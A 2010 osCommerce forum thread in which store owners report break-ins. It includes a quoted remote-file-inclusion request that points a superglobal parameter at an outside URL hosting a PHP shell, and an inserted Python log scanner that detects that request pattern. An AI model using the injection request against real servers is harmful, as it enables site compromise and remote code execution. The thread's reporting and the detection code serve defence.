Hack attempts


5 replies to this topic

#1 Gergely

  • Community Member
  • 345 posts
  • Real Name:Tóth Gergely
  • Gender:Male

Posted 13 September 2010, 16:16

Some days before...


V3 on Hack attempt was barren of results

http:\\thisismyshop.hu\checkout.php\?_SERVER[DOCUMENT_ROOT]=http:\\www.apc.edu.ec\temp?

The http:\\www.apc.edu.ec\temp? file includes PHP/Shell virus!!!!!! ATTENTION! DON'T OPEN THIS LINK!

Panda security reports:
PHP/Shell virus infection, file deleted.


My Error logs:
  • PHP Notice: Array to string conversion in osc3/includes/functions/html_output.php on line 488
  • PHP Notice: Array to string conversion in osc3/includes/functions/general.php on line 51
I found some info about this in this ebook, but osCommerce V3 is better than 2003 checkouts.

I used visitor web stats behind.
Header Footer Content Modules
SCM
V3

and some rewrites :-)
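
Added example (not part of the original thread): a small Python check that scans web access logs for the request pattern shown in post #1, where a query parameter is named after a PHP superglobal (`_SERVER[DOCUMENT_ROOT]`) and carries a remote URL. The log lines, hosts, function names and the Combined Log Format layout are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl

# PHP superglobal names; a request parameter must never be named after one.
SUPERGLOBALS = ("_SERVER", "_GET", "_POST", "_COOKIE", "_FILES",
                "_ENV", "_REQUEST", "_SESSION", "GLOBALS")
KEY_RE = re.compile(r"^(?:%s)(?:\[|$)" % "|".join(SUPERGLOBALS))
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Assumed Combined Log Format: client, request target, status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges and .example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Sep/2010:16:02:11 +0200] "GET /checkout.php/'
    '?_SERVER[DOCUMENT_ROOT]=http://files.example/temp? HTTP/1.1" 200 5120',
    '203.0.113.7 - - [13/Sep/2010:16:02:14 +0200] "GET /index.php'
    '?_SERVER%5BDOCUMENT_ROOT%5D=ftp://files.example/x HTTP/1.1" 200 4870',
    '198.51.100.23 - - [13/Sep/2010:16:03:40 +0200] "GET /product_info.php'
    '?products_id=12&osCsid=abc123 HTTP/1.1" 200 9211',
    '198.51.100.23 - - [13/Sep/2010:16:04:02 +0200] "GET /links.php'
    '?url=http://partner.example/ HTTP/1.1" 302 0',
]

def suspicious_params(target):
    """Return (name, value, is_remote_url) for superglobal-named parameters."""
    query = target.partition("?")[2]
    hits = []
    # parse_qsl percent-decodes names, so %5B/%5D variants are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if KEY_RE.match(name):
            hits.append((name, value, bool(REMOTE_RE.match(value))))
    return hits

def scan(lines):
    """Return (client, status, name, value, is_remote_url) per finding."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if m is None:
            continue  # not an access-log line in the assumed format
        client, target, status = m.groups()
        for name, value, remote in suspicious_params(target):
            findings.append((client, int(status), name, value, remote))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the request was attempted; whether anything was included depends on the PHP configuration and the application code.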

#2 DunWeb

  • Community Sponsor
  • 10,462 posts
  • Real Name:Chris Dunn
  • Gender:Male
  • Location:Tecumseh, Ontario, Canada N8N 1X8

Posted 13 September 2010, 19:54

Toth,

I am sure you have read this before, but let me type it again......v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

Chris
:|: Was this post helpful ? Click the LIKE THIS button :|:

:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:

:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:

#3 Gergely

  • Community Member
  • 345 posts
  • Real Name:Tóth Gergely
  • Gender:Male

Posted 13 September 2010, 20:02

DunWeb, on 13 September 2010, 19:54, said:

Toth,

I am sure you have read this before, but let me type it again......v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

Chris

Chris,


Yes, I know.

v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

But RC without some security options is more dangerous.

Edited by Gergely, 13 September 2010, 20:12.


#4 juanfer2k

  • Community Member
  • 2 posts
  • Real Name:Juan Fernando Cepeda G

Posted 30 November 2010, 17:02

Gergely, on 13 September 2010, 20:02, said:

Chris,


Yes, I know.

v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

But RC without some security options is more dangerous.


My case was on the RC2. I just found the store's index page changed to an Arabic message, and titled "hacked by some Doctor Whatever".

What I did was to clear the entire estore/db structure and go back to the backup.

However, these days I found 3 suspect files named m.html, s.html, and another one, askim???.php, which had some postcard sending feature and an emo child crying at the top.
Here's one of the first files stored in pastebin:

http://pastebin.com/PHAWmMLA

Someone at my hosting service told us it was just an exploit and the risk was low, but they didn't see these files. I just found out,

Thanks in advance,

Juanfer

#5 juanfer2k

  • Community Member
  • 2 posts
  • Real Name:Juan Fernando Cepeda G

Posted 20 December 2010, 16:45

We've been hacked, a few months ago for sure.
We restored backups and then I found in my store's root 3 files: s.php, x.html and mailer.php (for now those are the weird ones).

I pasted the code for the 3 files here:
http://pastebin.com/wm7eLavM

I am currently downloading and will try to do a VERY CLEAN installation of the newest 2.3.1 version, but will require some advice to avoid hacking attempts that often.

Our store is located under http://pilarholguin.com.co/tienda

Edited by juanfer2k, 20 December 2010, 16:49.


#6 DunWeb

  • Community Sponsor
  • 10,462 posts
  • Real Name:Chris Dunn
  • Gender:Male
  • Location:Tecumseh, Ontario, Canada N8N 1X8

Posted 20 December 2010, 17:35

Juan,

Your template is not functional. You are losing the OSCID when you click the main product image and the other PHP links do not work either (page not found)

It also appears you are trying to update your site to version 2.3.1 and failed to complete the process.



Chris